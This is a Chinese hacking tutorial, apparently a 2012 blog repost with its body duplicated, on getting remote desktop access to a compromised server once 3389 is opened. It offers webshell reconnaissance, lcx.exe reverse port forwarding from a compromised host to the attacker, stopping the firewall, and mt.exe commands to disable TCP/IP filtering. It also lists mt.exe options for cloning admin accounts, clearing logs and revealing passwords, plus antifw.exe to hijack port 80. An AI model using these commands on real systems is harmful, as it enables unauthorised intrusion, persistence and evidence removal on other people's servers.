開了3389后WEB滲透遠程連接不上的分析與解決
發(fā)布時間:2012-06-07 08:19:20 作者:佚名
我要評論
3389開了后.有時候遠程連接不上.我們來分析一下
對于開了3389,連接不上,有幾個方面的原因,我來總結下,哇咔咔,這幾天提好幾臺服務器都TM這樣,分析下,
原因1、遠程桌面端口被更改。2、對方服務器處于內網(wǎng)。3、防火墻攔截。4、TCP/IP安全限制。
好了,知道原因了,我們來一個一個思考解決方法(部分引用):
遠程桌面端口被更改解決方法:
現(xiàn)在一般的asp大馬都有探測服務器的功能,在權限還行的情況下都可以直接查看遠程(Terminal Service)端口,或者可以查看注冊表也可以得到遠程桌面端口,asp權限不行,在支持aspx的時候就換aspx查看注冊表。
對方服務器處于內網(wǎng)解決方法:
這種情況我們可以使用lcx做端口轉發(fā),不知道的或者沒有的就百度“lcx.exe下載”,我就不提供下載了。
使用方法:
1.上傳lcx.exe到目標服務器可執(zhí)行目錄
2.本地主機啟動lcx.exe監(jiān)聽,命令:
lcx.exe -listen 1988 4567 // 監(jiān)聽1988端口并轉發(fā)到4567端口
在目標主機運行:
格式為:
lcx.exe -slave 你的IP 你監(jiān)聽的端口 肉機IP 要轉發(fā)的目標主機端口
例子:lcx.exe -slave 192.168.86.1 1988 192.168.86.3 3389
3.本地鏈接:127.0.0.1:1988
OK,有點小麻煩,不過還是很管用的,要是你也是內網(wǎng),你就做下端口映射就好了,映射到轉發(fā)回來的端口,哇咔咔。
4、防火墻攔截解決辦法:
一般還是先試試端口轉發(fā),還是利用LCX,
使用方法:
lcx.exe -slave 你的IP 你監(jiān)聽的端口 肉機 要轉發(fā)的目標主機端口
例子:lcx.exe -slave 192.168.86.1 1988 192.168.86.3 3389
然后本地連接:127.0.0.1:1988 就搞定了。
如果還不行。。要是web是SYSTEM權限,直接停掉防火墻服務就沒問題了。
5、TCP/IP安全策略限制。
這個解決方法就有點多了,可以使用MT.EXE來關閉策略,
使用方法:
1.上傳mt.exe到目標服務器可執(zhí)行目錄
2.執(zhí)行命令:mt.exe -filter off
這樣就關閉了TCP/IP限制了
選項:
-filter —更改TCP/IP 過濾器的開頭狀態(tài)
-addport —添加端口到過濾器的允許列表
-setport —設置端口作為過濾器的允許列表
-nicinfo —列出TCP/IP 界面信息
-pslist —列出活動進程
-pskill —殺毒指定進程
-dlllist —列出指定進程的DLL
-sysinfo —列出系統(tǒng)信息
-shutdown —關閉系統(tǒng)
-reboot —重啟系統(tǒng)
-poweroff —關閉電源
-logoff —注銷當前用戶會話
-chkts —檢查終端服務信息
-setupts —安裝終端服務
-remts —卸載終端服務
-chgtsp —重置終端服務端口
-clog —清除系統(tǒng)日志
-enumsrv —列出所有服務
-querysrv —列出指定服務的詳細信息
-instsrv —安裝一個服務
-cfgsrv —更改服務配置
-remsrv —卸載指定服務
-startsrv —啟動指定服務
-stopsrv —停止指定服務
-netget —從http/ftp 下載
-redirect —端口重定向
-chkuser —列出所有賬戶、sid 和anti 克隆
-clone —克隆admin 到目標
-never —設置賬戶看上去從未登錄
-killuser —刪除賬戶,甚至是 “guest” 也可刪除
-su —以Local_System 權限運行進程
-findpass —顯示所有已登錄用戶的口令
-netstat —列出TCP 連接
-killtcp —殺死TCP 連接
-psport —映射端口到進程
-touch —設置文件日期和時間到指定值
-secdel —安全擦除文件或目錄占用的空間
-regshell —進入一個控制臺注冊表編輯器
-chkdll —檢測gina dll 后門
上面只是一種方法,再說一種好用的方法吧,成功率灰常高,哇咔咔。
使用antifw.exe這個工具,
使用方法:
在cmd下輸入
antifw -s 運行程序 停止iis將3389改為80
antifw -l 關閉程序?;謴蚷is
連接的時候直接連接他的80端口就OK了,內網(wǎng)外網(wǎng)通殺!成功率比較高。但是這樣他網(wǎng)站就訪問不了。。。
沒事,上去了我們趕緊分析原因,排除萬難,把限制去掉,再給他還原80端口,哇咔咔。。。
By:Seay
原因1、遠程桌面端口被更改。2、對方服務器處于內網(wǎng)。3、防火墻攔截。4、TCP/IP安全限制。
好了,知道原因了,我們來一個一個思考解決方法(部分引用):
遠程桌面端口被更改解決方法:
現(xiàn)在一般的asp大馬都有探測服務器的功能,在權限還行的情況下都可以直接查看遠程(Terminal Service)端口,或者可以查看注冊表也可以得到遠程桌面端口,asp權限不行,在支持aspx的時候就換aspx查看注冊表。
對方服務器處于內網(wǎng)解決方法:
這種情況我們可以使用lcx做端口轉發(fā),不知道的或者沒有的就百度“lcx.exe下載”,我就不提供下載了。
使用方法:
1.上傳lcx.exe到目標服務器可執(zhí)行目錄
2.本地主機啟動lcx.exe監(jiān)聽,命令:
lcx.exe -listen 1988 4567 // 監(jiān)聽1988端口并轉發(fā)到4567端口
在目標主機運行:
格式為:
lcx.exe -slave 你的IP 你監(jiān)聽的端口 肉機IP 要轉發(fā)的目標主機端口
例子:lcx.exe -slave 192.168.86.1 1988 192.168.86.3 3389
3.本地鏈接:127.0.0.1:1988
OK,有點小麻煩,不過還是很管用的,要是你也是內網(wǎng),你就做下端口映射就好了,映射到轉發(fā)回來的端口,哇咔咔。
4、防火墻攔截解決辦法:
一般還是先試試端口轉發(fā),還是利用LCX,
使用方法:
lcx.exe -slave 你的IP 你監(jiān)聽的端口 肉機 要轉發(fā)的目標主機端口
例子:lcx.exe -slave 192.168.86.1 1988 192.168.86.3 3389
然后本地連接:127.0.0.1:1988 就搞定了。
如果還不行。。要是web是SYSTEM權限,直接停掉防火墻服務就沒問題了。
5、TCP/IP安全策略限制。
這個解決方法就有點多了,可以使用MT.EXE來關閉策略,
使用方法:
1.上傳mt.exe到目標服務器可執(zhí)行目錄
2.執(zhí)行命令:mt.exe -filter off
這樣就關閉了TCP/IP限制了
選項:
-filter —更改TCP/IP 過濾器的開頭狀態(tài)
-addport —添加端口到過濾器的允許列表
-setport —設置端口作為過濾器的允許列表
-nicinfo —列出TCP/IP 界面信息
-pslist —列出活動進程
-pskill —殺毒指定進程
-dlllist —列出指定進程的DLL
-sysinfo —列出系統(tǒng)信息
-shutdown —關閉系統(tǒng)
-reboot —重啟系統(tǒng)
-poweroff —關閉電源
-logoff —注銷當前用戶會話
-chkts —檢查終端服務信息
-setupts —安裝終端服務
-remts —卸載終端服務
-chgtsp —重置終端服務端口
-clog —清除系統(tǒng)日志
-enumsrv —列出所有服務
-querysrv —列出指定服務的詳細信息
-instsrv —安裝一個服務
-cfgsrv —更改服務配置
-remsrv —卸載指定服務
-startsrv —啟動指定服務
-stopsrv —停止指定服務
-netget —從http/ftp 下載
-redirect —端口重定向
-chkuser —列出所有賬戶、sid 和anti 克隆
-clone —克隆admin 到目標
-never —設置賬戶看上去從未登錄
-killuser —刪除賬戶,甚至是 “guest” 也可刪除
-su —以Local_System 權限運行進程
-findpass —顯示所有已登錄用戶的口令
-netstat —列出TCP 連接
-killtcp —殺死TCP 連接
-psport —映射端口到進程
-touch —設置文件日期和時間到指定值
-secdel —安全擦除文件或目錄占用的空間
-regshell —進入一個控制臺注冊表編輯器
-chkdll —檢測gina dll 后門
上面只是一種方法,再說一種好用的方法吧,成功率灰常高,哇咔咔。
使用antifw.exe這個工具,
使用方法:
在cmd下輸入
antifw -s 運行程序 停止iis將3389改為80
antifw -l 關閉程序?;謴蚷is
連接的時候直接連接他的80端口就OK了,內網(wǎng)外網(wǎng)通殺!成功率比較高。但是這樣他網(wǎng)站就訪問不了。。。
沒事,上去了我們趕緊分析原因,排除萬難,把限制去掉,再給他還原80端口,哇咔咔。。。
By:Seay
相關文章

局域網(wǎng)共享安全方式之用局域網(wǎng)文件共享系統(tǒng)實現(xiàn)共享文件夾安全設置
現(xiàn)在很多單位都有文件服務器,經常會共享文件讓局域網(wǎng)用戶訪問。那么,如何才能保護局域網(wǎng)內共享文件夾的安全性呢?下面通過本文給大家分享局域網(wǎng)共享安全方式之用局域網(wǎng)文2017-05-11- 這篇文章主要介紹了IIS的FastCGI漏洞處理方法,需要的朋友可以參考下2017-04-30
IIS PHP fastcgi模式 pathinfo取值錯誤任意代碼執(zhí)行漏洞修復方法
這篇文章主要介紹了PHP fastcgi模式 pathinfo取值錯誤任意代碼執(zhí)行漏洞,需要的朋友可以參考下2017-04-30- IIS短文件名泄露漏洞,IIS上實現(xiàn)上存在文件枚舉漏洞,攻擊者可利用此漏洞枚舉獲取服務器根目錄中的文件,這里為大家分享一下安裝方法,需要的朋友可以參考下2017-04-23
用mcafee麥咖啡設置服務器基本用戶安全(防止新建用戶與修改密碼)
這篇文章主要介紹了用麥咖啡設置服務器基本用戶安全(防止新建用戶與修改密碼),需要的朋友可以參考下2017-02-26- 這篇文章主要介紹了防范黑客入侵,關閉端口封鎖大門 黑客無法入侵的相關資料,需要的朋友可以參考下2016-10-31
現(xiàn)代網(wǎng)絡性能監(jiān)控工具應具備何種技能?網(wǎng)絡與應用程序監(jiān)控
大家都知道現(xiàn)在市場上的網(wǎng)絡性能監(jiān)控工具大有所在,這為現(xiàn)在的IT行業(yè)的人員提供了很多便利,幫助IT管理團隊監(jiān)控網(wǎng)絡性能,并且?guī)椭鶬T管理人員確定系統(tǒng)性能的瓶頸所在,進而2016-10-19- 雖然現(xiàn)在網(wǎng)絡很發(fā)達,但對我們普通人而言,也就是10多年的上網(wǎng)歷史,好多人還沒意識到信息安全的重要性。那么如何保證自己的上網(wǎng)安全?下面小編為大家分享10條防范自救,一2016-10-12
- 這篇文章主要介紹了遠離病毒 八項基本原則的相關資料,需要的朋友可以參考下2016-10-08
- 這篇文章主要介紹了Linux 防范病毒的方法的相關資料,需要的朋友可以參考下2016-10-08


